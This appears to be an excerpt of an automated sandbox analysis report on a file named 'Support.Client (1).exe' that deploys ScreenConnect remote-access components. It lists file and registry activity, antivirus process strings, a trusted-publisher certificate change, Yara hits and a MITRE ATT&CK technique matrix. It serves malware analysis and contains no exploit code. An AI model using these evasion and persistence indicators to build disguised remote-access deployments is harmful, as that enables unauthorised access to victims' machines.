Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe

Code function: 11_2_04FDD498 CreateNamedPipeW,

11_2_04FDD498

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00611806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00611806

Source: C:\Users\user\Desktop\Support.Client (1).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Adds / modifies Windows certificates

Source: C:\Users\user\Desktop\Support.Client (1).exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Remote Access Functionality

Yara detected ScreenConnect Tool

Source: Yara match	File source: 9.0.ScreenConnect.WindowsClient.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 6996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Obfuscated Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	2 Windows Service	2 Windows Service	1 Install Root Certificate	Security Account Manager	65 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	13 Process Injection	1 Timestomp	NTDS	71 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Search Order Hijacking	Cached Domain Credentials	71 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	71 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	13 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Users	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Bootkit	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
